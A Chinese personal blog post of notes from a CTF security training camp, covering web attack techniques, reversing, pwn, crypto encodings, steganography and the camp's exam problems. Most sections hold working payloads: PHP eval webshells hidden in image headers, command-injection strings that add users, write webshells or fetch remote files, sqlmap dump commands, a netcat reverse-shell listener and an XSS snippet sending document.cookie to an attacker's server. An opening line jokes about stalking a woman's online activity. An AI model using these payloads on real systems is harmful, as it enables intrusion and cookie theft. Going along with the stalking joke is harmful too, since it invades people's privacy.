<h3 id="社工"><a href="#社工" class="headerlink" title="社工"></a>社工</h3><p>论如何通过各种渠道勾搭妹子或者悄咪咪视奸她的各种动态/滑稽</p>
<h2 id="day2-web"><a href="#day2-web" class="headerlink" title="day2 web"></a>day2 web</h2><h3 id="书"><a href="#书" class="headerlink" title="书"></a>书</h3><p>cookbook系列<br>精通脚本黑客<br>web深度解剖<br>乌云的漏洞库 8w<br>端口对应表（对每个端口的漏洞进行测试挖掘）</p>
<h3 id="网页流程"><a href="#网页流程" class="headerlink" title="网页流程"></a>网页流程</h3><p>个人-网络-cdn-对方服务器（安全狗WAF-中间件-mysql）-网页打印<br><br>waf<br>1.木马免杀 <br> 2.个人到网络时把流量转发到本地 base64_encode(),转发到网络 中转尝试突破防护</p>
<h3 id="测试"><a href="#测试" class="headerlink" title="测试"></a>测试</h3><p>黑盒/白盒/灰盒测试</p>
<h3 id="渗透流程"><a href="#渗透流程" class="headerlink" title="渗透流程"></a>渗透流程</h3><h4 id="1-信息收集："><a href="#1-信息收集：" class="headerlink" title="1.信息收集："></a>1.信息收集：</h4><p>域名、二级域名、社工、旁站、C段<br>社工<br>google hacking(bing&gt;baidu)  <br>社工库 <br> 网站信息（支付宝、朋友网、淘宝个人空间）</p>
<h4 id="2-尝试漏洞-进入内网"><a href="#2-尝试漏洞-进入内网" class="headerlink" title="2.尝试漏洞(进入内网)"></a>2.尝试漏洞(进入内网)</h4><p>端口的未授权访问（redis/memcache）</p>
<h4 id="3-可能的问题：漏洞没打补丁"><a href="#3-可能的问题：漏洞没打补丁" class="headerlink" title="3.可能的问题：漏洞没打补丁"></a>3.可能的问题：漏洞没打补丁</h4><p>域</p>
<h3 id="弱口令"><a href="#弱口令" class="headerlink" title="弱口令"></a>弱口令</h3><p>连续性<br>判断是否登录成功</p>
<h4 id="暴力破解-burp演示"><a href="#暴力破解-burp演示" class="headerlink" title="暴力破解(burp演示)"></a>暴力破解(burp演示)</h4><p>sinper 单变量 单字典<br>battering ram 多变量 单字典<br>pitchfork 多变量 多字典 字典一一对应<br>cluster bomb 单变量 多字典 循环爆破 一对多<br>(注意打开302跳转)<br>(burp-response乱码:user options-display-font)<br></p>
<h4 id="工具"><a href="#工具" class="headerlink" title="工具"></a>工具</h4><p>hydra<br>arpr<br>3389<br>pkav http fuzzer</p>
<h4 id="测试一发"><a href="#测试一发" class="headerlink" title="测试一发~"></a>测试一发~</h4><p><a href="http://192.168.50.60/dvwa" target="_blank" rel="external">http://192.168.50.60/dvwa</a><br>admin password</p>
<h3 id="SQL注入（针对每一种数据）"><a href="#SQL注入（针对每一种数据）" class="headerlink" title="SQL注入（针对每一种数据）"></a>SQL注入（针对每一种数据）</h3><p>执行操作 读写操作 增删改查<br>编程语言接受参数<br>单引号-xor异或<br>防护软件基于黑名单验证<br>select * from user where id=1 xor ‘a’=’a’<br>浏览器处理特殊字符时转URL编码<br>整形/字符串注入<br>注释符<br>内联注入 1’ and ‘1’=’1<br>终止注入 1’ and 1=1#<br>畸形解析 id=(((([(变量)]))))<br>MSSQL 执行权限 cmdshell<br>MySQL 执行权限 默认不存在执行权限<br>数据库-表-字段-值<br>具体流程：<br>union查询<br>偏移注入<br>二次注入<br>宽字节注入<br>伪静态注入<br>报错注入<br>盲注<br>布尔注入<br>时间注入</p>
<h4 id="工具-1"><a href="#工具-1" class="headerlink" title="工具"></a>工具</h4><p>havij<br>sqlmap 可用python自定义编辑bypass脚本</p>
<h4 id="acess"><a href="#acess" class="headerlink" title="acess"></a>acess</h4><p>sqlmap -u url –tables<br>sqlmap -u url -T “表名” –cloumns<br>sqlmap -u url -T “表名” -C “列名” –dump</p>
<h4 id="mysql"><a href="#mysql" class="headerlink" title="mysql"></a>mysql</h4><p>sqlmap -u url –dbs<br>sqlmap -u url –tables -D “数据库”<br>sqlmap -u url -T “表名” -D “数据库” –cloums<br>sqlmap -u url -T “表名” -C “列名” -D “数据库” –dump<br>id=(((([(变量)]))))时 sqlmap -u url –dbs –prefix=”)]))))”<br>–threads=10 线程<br>–dbms=DBMS<br>有乱码或空内容<br>–no-cast<br>–hex<br>–charset=GBK<br>增加大量payload<br>–risk=RISK (1-3,default 1)<br>–level=LEVEL (1-5,default 1)<br>–level 1 默认检测 get post<br>–level 1 默认检测 get post cookie<br>–level 5 检测所有http头信息<br>–string=STRING<br>–code=CODE<br>–technique=TECH SQL injection techniques to use (default “BEUSTQ”)<br>–tamper 使用插件<br>–flush 清空缓存<br>post 表单提交<br>-r<br>–data<br>–forms</p>
<h3 id="上传漏洞"><a href="#上传漏洞" class="headerlink" title="上传漏洞"></a>上传漏洞</h3><h4 id="js验证"><a href="#js验证" class="headerlink" title="js验证"></a>js验证</h4><p>目测：网页不用加载流量<br>删去onsubmit事件<br>进about:config把javascript.enabled改成false<br>禁用javascript<br>先改后缀再用burp改回去</p>
<h4 id="MIME验证"><a href="#MIME验证" class="headerlink" title="MIME验证"></a>MIME验证</h4><p>content-type:image/jpeg<br>image/gif<br>image/png<br>image/jpeg<br>image/bmp</p>
<h4 id="内容验证"><a href="#内容验证" class="headerlink" title="内容验证"></a>内容验证</h4><p>copy把php放在jpg后（前加个空格）<br>copy mmm.png/b+mm.php mm2.png<br>把php加进jpg属性中写在版权或啥里</p>
<h4 id="服务端扩展名-后缀名-验证"><a href="#服务端扩展名-后缀名-验证" class="headerlink" title="服务端扩展名(后缀名)验证"></a>服务端扩展名(后缀名)验证</h4><h5 id="操作系统-window"><a href="#操作系统-window" class="headerlink" title="操作系统 window"></a>操作系统 window</h5><p>php.<br>php空格<br>php::$data<br>文件流特性<br>大小写</p>
<h5 id="中间件"><a href="#中间件" class="headerlink" title="中间件"></a>中间件</h5><h6 id="IIS-6"><a href="#IIS-6" class="headerlink" title="IIS 6"></a>IIS 6</h6><p>1.asp、cer、cdx、asa都被解析为asp文件<br>2.目录为1.asp则其他所有文件都解析为asp文件<br>3.1.asp;1.jpg 1.asp;.jpg上传成功内容为空<br>4.1.asp%001.jpg</p>
<h6 id="IIS-7"><a href="#IIS-7" class="headerlink" title="IIS 7"></a>IIS 7</h6><p>fast-cgi漏洞<br>上传图片马 1.jpg =&gt; 1.jpg/xxx.php</p>
<h6 id="nginx"><a href="#nginx" class="headerlink" title="nginx"></a>nginx</h6><p>上传图片马 1.jpg =&gt; 1.jpg%00xxx.php<br>上传图片马 1.jpg =&gt; 1.jpg/xxx.php</p>
<h6 id="light"><a href="#light" class="headerlink" title="light"></a>light</h6><p>fast-cgi漏洞<br>上传图片马 1.jpg =&gt; 1.jpg/xxx.php</p>
<h6 id="apache"><a href="#apache" class="headerlink" title="apache"></a>apache</h6><p>从右向左解析，如果最后的无法解析，则解析前一个<br>php3 php4 phpml php5 pht 基于debian/ubuntu的apt-get安装lamp</p>
<h4 id="代码层"><a href="#代码层" class="headerlink" title="代码层"></a>代码层</h4><p>&lt;?php…..?&gt;判断文件头&lt;?php<br>（看php.ini）<br>&lt;?php … ?&gt; 默认的php代码风格<br>&lt;?…..?&gt; short_open_tag=on php短标签风格<br>&lt;%…..%&gt; asp_tags=off asp风格<br><code>&lt;script language=&quot;php&quot;&gt;.....&lt;/script&gt;</code> 脚本风格<br>GIF89a &lt;?php eval($_POST[‘a’])?&gt; 1.jpg<br>GIF89a &lt;? eval($_POST[‘a’])?&gt; 2.jpg<br>GIF89a &lt;% eval($_POST[‘a’])%&gt; 3.jpg<br>GIF89a <code>&lt;script language=&quot;php&quot;&gt; eval($_POST[&#39;a&#39;]);&lt;/script&gt;</code>  4.jpg<br>GIF89a &lt;% execute(request(1))%&gt; 5.jpg</p>
<h4 id="特殊上传漏洞"><a href="#特殊上传漏洞" class="headerlink" title="特殊上传漏洞"></a>特殊上传漏洞</h4><h5 id="目录验证上传"><a href="#目录验证上传" class="headerlink" title="目录验证上传"></a>目录验证上传</h5><p>在A/b/c/是上传保存文件目录，存在一个脚本，判断c目录下是否存在php后缀的文件，如果存在，则删除。存在一个定义路径的变量和上传文件的变量<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div></pre></td><td class="code"><pre><div class="line">Content-Disposition: form-data; name=&quot;path&quot;</div><div class="line"></div><div class="line">../images</div><div class="line">-----------------------------190023260920007</div><div class="line">Content-Disposition: form-data; name=&quot;upfile&quot;; filename=&quot;1.php&quot;</div><div class="line">Content-Type: application/octet-stream</div><div class="line"></div><div class="line">&lt;?php</div><div class="line">phpinfo();</div></pre></td></tr></table></figure></p>
<p>修改path，导致上传路径变到b目录下，不存在检测，则绕过验证</p>
<h5 id="双文件上传"><a href="#双文件上传" class="headerlink" title="双文件上传"></a>双文件上传</h5><p>在c是上传保存文件目录，代码存在bug，可以一次上传多个文件，但是检测的时候只检测第一个上传的文件，导致了使用双文件上传直接突破</p>
<h4 id="编辑漏洞-ewebedit-fck"><a href="#编辑漏洞-ewebedit-fck" class="headerlink" title="编辑漏洞(ewebedit fck)"></a>编辑漏洞(ewebedit fck)</h4><h3 id="文件包含"><a href="#文件包含" class="headerlink" title="文件包含"></a>文件包含</h3><h4 id="本地"><a href="#本地" class="headerlink" title="本地"></a>本地</h4><p>include $_GET[“file”].”tpl”;<br>1.%00截断 include.php?file=2.txt%00<br>2.window下文件名最大长度259，unix为4099。后面用…..填充可忽略<br>include “test/“.$<em>GET[‘file’];<br>加../2.txt就好~<br>include “test</em>“.$_GET[‘file’];<br>加/../2.txt就好~</p>
<h4 id="IIS-短标签"><a href="#IIS-短标签" class="headerlink" title="IIS 短标签"></a>IIS 短标签</h4><p>&lt; === . 一个任意字符<br>&lt;&lt; === .* 多个任意字符<br>dchnjrhaufgfipHHAWKRGIORHA.txt === d&lt;&lt;<br>如果首个字母相同，比较第二位的ascii，读取小的，以此类推</p>
<h4 id="远程文件包含"><a href="#远程文件包含" class="headerlink" title="远程文件包含"></a>远程文件包含</h4><p>allow_url_include=off（http or ftp or https）<br>file=php://input就可</p>
<h4 id="伪协议"><a href="#伪协议" class="headerlink" title="伪协议"></a>伪协议</h4><p>?file=php://filter/convert.base64-encode/resource=xxx.php</p>
<h2 id="day3-web"><a href="#day3-web" class="headerlink" title="day3 web"></a>day3 web</h2><h3 id="XSS"><a href="#XSS" class="headerlink" title="XSS"></a>XSS</h3><p>反射型<br>存储型<br>标签<br><code>&lt;script&gt;alert()&lt;/script&gt;</code><br><code>&lt;body onload=alert()&gt;</code><br><code>&lt;input name=&quot;user&quot; value=&quot;变量&quot;&gt;</code><br>内联<br><code>&lt;input name=&quot;user&quot; value=&quot;1&quot; onmouseover=&quot;alert()&quot;&gt;</code><br>1” onmouseover=”alert()<br>终止<br><code>&lt;input name=&quot;user&quot; value=&quot;1&quot; onmouseover=alert()//&quot;&gt;</code><br>1” onmouseover=alert()//<br>html<br><code>&lt;input name=&quot;user&quot; value=&quot;&quot;&gt;&lt;svg/onload=alert()&gt;&quot;&gt;</code><br><code>&quot;&gt;&lt;svg/onload=alert()&gt;</code><br>xss平台 窃取访问插入处页面用户的cookie<br>工具 beef</p>
<h3 id="目录遍历"><a href="#目录遍历" class="headerlink" title="目录遍历"></a>目录遍历</h3><p>IIS关闭目录浏览<br>Apache中改options</p>
<h3 id="任意文件下载"><a href="#任意文件下载" class="headerlink" title="任意文件下载"></a>任意文件下载</h3><p>xxx.php?n=../index.php<br>模糊测试：<br>../index.php<br><code>&lt;script&gt;alert()&lt;/script&gt;</code><br>…</p>
<h3 id="任意文件删除"><a href="#任意文件删除" class="headerlink" title="任意文件删除"></a>任意文件删除</h3><h3 id="防护"><a href="#防护" class="headerlink" title="防护"></a>防护</h3><p>包含文件硬编码<br>过滤../<br>安装第三方安全软件</p>
<h3 id="命令执行"><a href="#命令执行" class="headerlink" title="命令执行"></a>命令执行</h3><p>ping 变量<br>ping 127.0.0.1 | echo “aa”<br>ping 127.0.0.1 | net user c4 c4 /ad<br>ping 127.0.0.1 &amp; net user<br>ping 127.0.0.1 &amp;&amp; net user</p>
<h4 id="绕过手法"><a href="#绕过手法" class="headerlink" title="绕过手法"></a>绕过手法</h4><p>管道符：window:| &amp; &amp;&amp; unix:| &amp; &amp;&amp; ;<br>中间件是system/root 服务器提权<br>ping 变量 | net user c4 c4 /ad<br>中间件是user web提权(webshell)<br>ping 变量 | echo “&lt;?php eval($_POST[1])?&gt;” 1.php<br>ping 变量 | wget <a href="http://xxx.com/1.php" target="_blank" rel="external">http://xxx.com/1.php</a> 远程下载 wget curl<br>window：<br>ping 变量 | dir 列目录<br>ping 变量 | type conn.php 读取数据库配置文件<br>linux：<br>ping 变量 | ls 列目录<br>ping 变量 | cat conn.php 读取数据库配置文件<br>注释<br>空格的替换 关注 09 0A 0C 0D A0 20 (16进制)<br><code>/*!...*/</code></p>
<h4 id="防护-1"><a href="#防护-1" class="headerlink" title="防护"></a>防护</h4><p>尽量不使用外部调用<br>过滤管道符</p>
<h3 id="越权-逻辑漏洞"><a href="#越权-逻辑漏洞" class="headerlink" title="越权 逻辑漏洞"></a>越权 逻辑漏洞</h3><p>平行越权 权限类型不变，id改变<br>垂直越权 id不变，权限类型改变<br>交叉越权 </p>
<p>web_end…<br>虽然差不多都是已经了解了的基础但是了解的更深♂入、更系统惹~<br>感觉这个有着女声的老师讲的挺好其实:D</p>
<h2 id="day3-re"><a href="#day3-re" class="headerlink" title="day3 re"></a>day3 re</h2><h3 id="书-1"><a href="#书-1" class="headerlink" title="书"></a>书</h3><p>黑客反汇编揭秘<br>逆向工程核心原理</p>
<h3 id="数据存储顺序"><a href="#数据存储顺序" class="headerlink" title="数据存储顺序"></a>数据存储顺序</h3><p>大端模式（高位字节存入低地址，低位字节存入高地址）<br>小端模式（低位字节存入低地址，高位字节存入高地址）Intel x86</p>
<h3 id="存储格式"><a href="#存储格式" class="headerlink" title="存储格式"></a>存储格式</h3><p>ASCII与UNICODE<br>Unicode是ASCII字符编码的一种扩展</p>
<h3 id="windows基本架构"><a href="#windows基本架构" class="headerlink" title="windows基本架构"></a>windows基本架构</h3><p>用户态Ring3/核心态Ring0</p>
<h3 id="PE文件结构"><a href="#PE文件结构" class="headerlink" title="PE文件结构"></a>PE文件结构</h3><p>注意4D 5A DOS部分-PE文件头-节表-节数据</p>
<h3 id="工具-2"><a href="#工具-2" class="headerlink" title="工具"></a>工具</h3><p>调试工具<br>OD1.1(32)&amp;OD2.0(64)&amp;插件&amp;脚本<br>反汇编工具<br>IDA<br>其他<br>Peid 查壳<br>LoadPE dump内存镜像<br>importREC IAT修复<br>VM及镜像</p>
<p>然，，然后就实战啦？一脸萌比。。<br>ida快捷键<br>p 把选中的部分生成函数<br>x 然后双击<br>去除花指令<br>u 把乱七八糟的undefine掉<br>c 按住的地址就可以没了貌似。。。<br>Linux edb gdb</p>
<h2 id="day4-pwn"><a href="#day4-pwn" class="headerlink" title="day4 pwn"></a>day4 pwn</h2><p>linux基本操作<br>x86汇编<br>python<br>ida+gdb<br>pwntools<br>pwndbg<br>栈溢出</p>
<h3 id="书-2"><a href="#书-2" class="headerlink" title="书"></a>书</h3><p>0day安全：软件漏洞分析技术》基本是windows平台，基础全面技术也相对新颖<br>《漏洞战争软件漏洞分析精要》真实漏洞分析，各种技巧<br>《Exploit 编写系列教程》<a href="http://bbs.pediy.com/thread-123602.html" target="_blank" rel="external">http://bbs.pediy.com/thread-123602.html</a> 具体的编写流程，其中一些极限shellcode编写</p>
<p>end…<br>懵了一天半。。。会了最傻的逆向</p>
<h2 id="day5-crypto"><a href="#day5-crypto" class="headerlink" title="day5 crypto"></a>day5 crypto</h2><p>哈希（HASH）<br>md5 识别：16进制<br>sha1 40位<br>HASH——Windows口令 Wce.exe -l –&gt; 破解 Cain<br>Base64 加密图片<br>XXencode编码 +-0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz<br>UUencode编码<br>URL编码<br>Html语言<br>Ascii<br>shellcode编码 \x54\x68\x65\x64\x6f\x67<br>Quoted-printable编码 =开头<br>摩尔斯电码<br>JSfuck<br>jother Javascript的匿名函数<br>ppencode 把命令写到前面存为.sh在linux运行<br>brainfuck<br>敲击码/键盘码<br>Unicode编码 &amp;#x [Hex] &amp;# [Decimal] \U [Hex] \U+ [Hex]<br>置换密码<br>栅栏密码 注意中文拼音的捆绑<br>代换密码 恺撒密码 Vigenere密码 Vernam密码 Playfair密码 Hill密码<br>培根密码 <a href="http://rumkin.com/tools/cipher/baconian.php" target="_blank" rel="external">http://rumkin.com/tools/cipher/baconian.php</a><br>四方密码<br>猪圈密码<br>词频分析 <a href="http://www.quipqiup.com/index.php" target="_blank" rel="external">http://www.quipqiup.com/index.php</a><br>流密码<br>重用密钥攻击•使用初始向量 token<br>比特反转攻击•使用消息认证码<br>分组密码<br>DES <a href="http://e-file.arkoo.com/tools/des3.htm" target="_blank" rel="external">http://e-file.arkoo.com/tools/des3.htm</a><br>万能哒py脚本<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div></pre></td><td class="code"><pre><div class="line">import base64</div><div class="line">from Crypto.Cipher import DES</div><div class="line">obj = DES.new(&apos;12345678&apos;,DES.MODE_ECB)</div><div class="line">ciph=&quot;vQetoiCJ/7uG24mZlOXyhESJwCNfn+Ts&quot; #老师嗦这个有+和/的肯定是base64...虽然直接解貌似是乱码？</div><div class="line">ciph=base64.b64decode(ciph)</div><div class="line">ciph=obj.decrypt(ciph)</div><div class="line">print ciph</div></pre></td></tr></table></figure></p>
<p>导入库有问题的话，为什么不问问神奇的虚拟机呐~<br>公钥密码 RSA<br>•RSA的算法涉及三个参数，n、e1、e2。<br>•其中，n是两个大质数p、q的积，n的二进制表示时所占用的位数，就是所谓的密钥长度。<br>•e1和e2是一对相关的值，e1可以任意取，但要求e1与(p-1）<em>(q-1）互质；再选择e2，要求（e2</em>e1）mod((p-1）*(q-1））=1。<br>•（n，e1）,(n，e2）就是密钥对。其中(n，e1）为公钥，(n，e2）为私钥。<br>•RSA加解密的算法完全相同，设A为明文，B为密文，则：A=B^e2    mod    n；B=A^e1    mod    n；（公钥加密体制中，一般用公钥加密，私钥解密）•e1和e2可以互换使用，即：<br>•A=B^e1    mod    n；B=A^e2    mod    n;<br>因式分解n （也可用于判断质数）<br><a href="http://factordb.com/" target="_blank" rel="external">http://factordb.com/</a><br>小工具 Yafu:Factor(数字) （拖到命令行运行不然结束后会闪退貌似）<br>低加密指数（e）攻击（也称小e攻击）<br>选择密文攻击<br>共模攻击<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div></pre></td><td class="code"><pre><div class="line">#coding=utf-8</div><div class="line">def egcd(a, b):</div><div class="line">  if a == 0:</div><div class="line">    return (b, 0, 1)</div><div class="line">  else:</div><div class="line">    g, y, x = egcd(b % a, a)</div><div class="line">    return (g, x - (b // a) * y, y)</div><div class="line">def modinv(a, m):</div><div class="line">  g, x, y = egcd(a, m)</div><div class="line">  if g != 1:</div><div class="line">    raise Exception(&apos;modular inverse does not exist&apos;)</div><div class="line">  else:</div><div class="line">    return x % m</div><div class="line">def main():</div><div class="line">  n = int(raw_input(&quot;input n:&quot;))</div><div class="line">  c1 = int(raw_input(&quot;input c1:&quot;))</div><div class="line">  c2 = int(raw_input(&quot;input c2:&quot;))</div><div class="line">  e1 = int(raw_input(&quot;input e1:&quot;))</div><div class="line">  e2 = int(raw_input(&quot;input e2:&quot;))</div><div class="line">  s = egcd(e1, e2)</div><div class="line">  s1 = s[1]</div><div class="line">  s2 = s[2]</div><div class="line">  # 求模反元素</div><div class="line">  if s1&lt;0:</div><div class="line">    s1 = - s1</div><div class="line">    c1 = modinv(c1, n)</div><div class="line">  elif s2&lt;0:</div><div class="line">    s2 = - s2</div><div class="line">    c2 = modinv(c2, n)</div><div class="line">  m = (c1**s1)*(c2**s2)%n</div><div class="line">  print m</div><div class="line">if __name__ == &apos;__main__&apos;:</div><div class="line">  main()</div></pre></td></tr></table></figure></p>
<p>文件及数据库加密<br>mysql user.MYD<br>Access数据库<br>压缩包zip，rar的暴力破解</p>
<p>crypto_end…<br>感觉挺系统的吧，涨各种解密以及暴力姿势<br>都是工具，都是套路，一难就GG（比如最后讲解的那题。。数学从高中就不好了/手动再见）</p>
<h2 id="day5-misc"><a href="#day5-misc" class="headerlink" title="day5 misc"></a>day5 misc</h2><p>文件的作者，修改日期，属性，标签等等，都是属于文件的元数据<br>Windows上可直接通过右键查看元数据，Linux上可通过exiftool工具查看<br>文件末尾追加数据 Copy /b 1.png + 1.txt 2.png<br>可以使用十六进制编辑器查看如Winhex，Linux下可使用binwalk或者foremost工具进行文件分离<br>HTML信息隐藏 浏览器在解析HTML时会忽略行尾或HTML标记后的空白符号，但不会影响浏览器的显示结果的特点<br>LSB隐写就是修改了像数中的最低的1bit，在人眼看来是看不出来区别的，也把信息隐藏起来了<br>善用py的图形处理功能 PIL Image<br>注意二维码脑洞<br>音频信息隐写<br>MP3Stego：将隐藏文件和WAV文件合成一个MP3文件<br>MSU SetgoVideo：一个免费非开源的隐写工具，能够在全动态视频中隐写信息<br>TCStego：纯Python开发，以QuickTime和MP4多媒体容器作为载体隐藏信息<br>网络协议信息隐藏<br>ICMP协议隐写<br>TTL字段隐写<br>HTTP协议隐写：<br>空白隐写术：在传输的文本末尾附加空白和TAB等不可见字符，空格表示0，TAB表示1<br>大小写混排编码<br>非默认首字段值：发送请求时有些字段浏览器会添加一些默认值，可以修改默认值为01等要隐写的数据<br>自定义消息报头域：对于服务器无法识别的请求头服务器会忽略掉，可以自定义请求头字段来隐藏秘密信息<br>二进制对象排序隐藏：设置HTTP请求头排序的基准报文，然后对这些请求头进行编码排序或者删除隐藏信息<br>流量分析 参考书籍：《TCP/IP详解卷一：协议》<br>WireShark<br>ZIP伪加密</p>
<h2 id="day6-考核"><a href="#day6-考核" class="headerlink" title="day6 考核"></a>day6 考核</h2><p>哇这种web虐萌新啊QAQ<br>哇别的题怎么就那么友好<br>哇又是好多原题==<br>哇到处都是py==</p>
<h2 id="day7-讲解"><a href="#day7-讲解" class="headerlink" title="day7 讲解"></a>day7 讲解</h2><p>总而言之窝怎么啥都不造啊。。。瑟瑟发抖嘤嘤嘤QAQQQQQQQQQQQ</p>
<h3 id="原题"><a href="#原题" class="headerlink" title="原题"></a>原题</h3><p><a href="http://www.cnblogs.com/deen-/p/7148071.html" target="_blank" rel="external">这儿有两题</a></p>
<h3 id="waf"><a href="#waf" class="headerlink" title="waf"></a>waf</h3><p><code>/**/union/**/select/**/1,(selEct/**/...limit 0,1),3,4,5#</code><br>爆表<br>爆字段,爆flag。。。这种注释没见过吖QAQ<br>（SQL注入攻击与防御，web前端黑客技术揭秘，黑客攻防技术宝典）</p>
<h3 id="exploit"><a href="#exploit" class="headerlink" title="exploit"></a>exploit</h3><p>nc -lvvp 4444 反弹webshell。。。喵喵喵？<br>id<br>python 啥啥啥。。。沃日讲这么快干啥啊。。。<br>uname -a查看版本<br>在www.exploit-db.com上搜漏洞<br>传对应文件（temp是任何人都能写的）<br>gcc编译<br>执行<br>root权限了</p>
<h3 id="be-allowed"><a href="#be-allowed" class="headerlink" title="be allowed"></a>be allowed</h3><p>改x-forwared-for: localhost<br>robots.txt<br>/message/<br>username加js恶意代码偷取cookie<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">&lt;script&gt;</div><div class="line">(new Image()).src=&quot;http://(加自己的那个啥)&quot;+document.cookie;</div><div class="line">&lt;/script&gt;</div></pre></td></tr></table></figure></p>
<p>提示a=id<br>a=4报错，order by注入</p>
<h3 id="register"><a href="#register" class="headerlink" title="register"></a>register</h3><p>变量覆盖。。。连自己的数据库。。。还有这种操作。。</p>
<h3 id="研究生的秘密"><a href="#研究生的秘密" class="headerlink" title="研究生的秘密"></a>研究生的秘密</h3><p>mongodb注入<br>title[$ne]=…就好啦？？？</p>
<h3 id="manager1"><a href="#manager1" class="headerlink" title="manager1"></a>manager1</h3><p>导入带引号的csv<br>发现报错，SQL注入，会转成json<br>insert注入</p>
<h3 id="manager2"><a href="#manager2" class="headerlink" title="manager2"></a>manager2</h3><p>上传文件带入绝对路径<br>修改path<br>读取Apache的httpd.conf发现同服务器存在另一个站点<br>修改host文件访问</p>
<h2 id="肥家家。。。"><a href="#肥家家。。。" class="headerlink" title="肥家家。。。"></a>肥家家。。。</h2><p>发现安恒老板居然是金华的窝也是惊了<br>web汪吼可怜啊 窝好菜啊<br>另外终于喝到了网红奶茶 一點點入喉心作痛2333</p>
<p>END<br><br></p>

        
    

    
</div>


                

                <!-- Post Comments -->
                
                    
                
            </div>

            <!-- Post Prev & Next Nav -->
            <nav class="material-nav mdl-color-text--grey-50 mdl-cell mdl-cell--12-col">
    <!-- Prev Nav -->
    
        <a href="/2017/08/02/xman/" id="post_nav-newer" class="prev-content">
            <button class="mdl-button mdl-js-button mdl-js-ripple-effect mdl-button--icon mdl-color--white mdl-color-text--grey-900" role="presentation">
                <i class="material-icons">arrow_back</i>
            </button>
            &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
            新篇
        </a>
    

    <!-- Section Spacer -->
    <div class="section-spacer"></div>

    <!-- Next Nav -->
    
        <a href="/2017/07/22/dy/" id="post_nav-older" class="next-content">
            旧篇
            &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
            <button class="mdl-button mdl-js-button mdl-js-ripple-effect mdl-button--icon mdl-color--white mdl-color-text--grey-900" role="presentation">
                <i class="material-icons">arrow_forward</i>
            </button>
        </a>
    
</nav>

        </div>
    </div>



                    
                        <!-- Overlay For Active Sidebar -->
<div class="sidebar-overlay"></div>

<!-- Material sidebar -->
<aside id="sidebar" class="sidebar sidebar-colored sidebar-fixed-left" role="navigation">
    <div id="sidebar-main">
        <!-- Sidebar Header -->
        <div class="sidebar-header header-cover" style="background-image: url(/img/sidebar_header.png);">
    <!-- Top bar -->
    <div class="top-bar"></div>

    <!-- Sidebar toggle button -->
    <button type="button" class="sidebar-toggle mdl-button mdl-js-button mdl-js-ripple-effect mdl-button--icon" style="display: initial;" data-upgraded=",MaterialButton,MaterialRipple">
        <i class="material-icons">clear_all</i>
        <span class="mdl-button__ripple-container">
            <span class="mdl-ripple">
            </span>
        </span>
    </button>

    <!-- Sidebar Avatar -->
    <div class="sidebar-image">
        <img src="/img/2.jpg" alt="铃落's avatar">
    </div>

    <!-- Sidebar Email -->
    <a data-toggle="dropdown" class="sidebar-brand" href="#settings-dropdown">
        ringfall3@gmail.com
        <b class="caret"></b>
    </a>
</div>


        <!-- Sidebar Navigation  -->
        <ul class="nav sidebar-nav">
    <!-- User dropdown  -->
    <li class="dropdown">
        <ul id="settings-dropdown" class="dropdown-menu">
            
                <li>
                    <a href="#" target="_blank" title="Email Me">
                        
                            <i class="material-icons sidebar-material-icons sidebar-indent-left1pc-element">email</i>
                        
                        Email Me
                    </a>
                </li>
            
        </ul>
    </li>

    <!-- Homepage -->
    
        <li id="sidebar-first-li">
            <a href="/">
                
                    <i class="material-icons sidebar-material-icons">home</i>
                
                主页
            </a>
        </li>
        
    

    <!-- Archives  -->
    
        <li class="dropdown">
            <a href="#" class="ripple-effect dropdown-toggle" data-toggle="dropdown">
                
                    <i class="material-icons sidebar-material-icons">inbox</i>
                
                    归档
                <b class="caret"></b>
            </a>
            <ul class="dropdown-menu">
            <li>
                <a class="sidebar_archives-link" href="/archives/2018/01/">一月 2018<span class="sidebar_archives-count">1</span></a></li><li><a class="sidebar_archives-link" href="/archives/2017/12/">十二月 2017<span class="sidebar_archives-count">1</span></a></li><li><a class="sidebar_archives-link" href="/archives/2017/10/">十月 2017<span class="sidebar_archives-count">3</span></a></li><li><a class="sidebar_archives-link" href="/archives/2017/09/">九月 2017<span class="sidebar_archives-count">1</span></a></li><li><a class="sidebar_archives-link" href="/archives/2017/08/">八月 2017<span class="sidebar_archives-count">4</span></a></li><li><a class="sidebar_archives-link" href="/archives/2017/07/">七月 2017<span class="sidebar_archives-count">4</span></a>
            </ul>
        </li>
        
    

    <!-- Categories  -->
    
        <li class="dropdown">
            <a href="#" class="ripple-effect dropdown-toggle" data-toggle="dropdown">
                
                    <i class="material-icons sidebar-material-icons">chrome_reader_mode</i>
                
                分类
                <b class="caret"></b>
            </a>
            <ul class="dropdown-menu">
                <li>
                <a class="sidebar_archives-link" href="/categories/Blog/">Blog<span class="sidebar_archives-count">6</span></a></li><li><a class="sidebar_archives-link" href="/categories/Diary/">Diary<span class="sidebar_archives-count">5</span></a>
            </ul>
        </li>
        
    

    <!-- Pages  -->
    

    <!-- Article Number  -->
    
</ul>


        <!-- Sidebar Footer -->
        <!--
I'm glad you use this theme, the development is no so easy, I hope you can keep the copyright, I will thank you so much.
If you still want to delete the copyrights, could you still retain the first one? Which namely "Theme Material"
It will not impact the appearance and can give developers a lot of support :)

很高兴您使用并喜欢该主题，开发不易 十分谢谢与希望您可以保留一下版权声明。
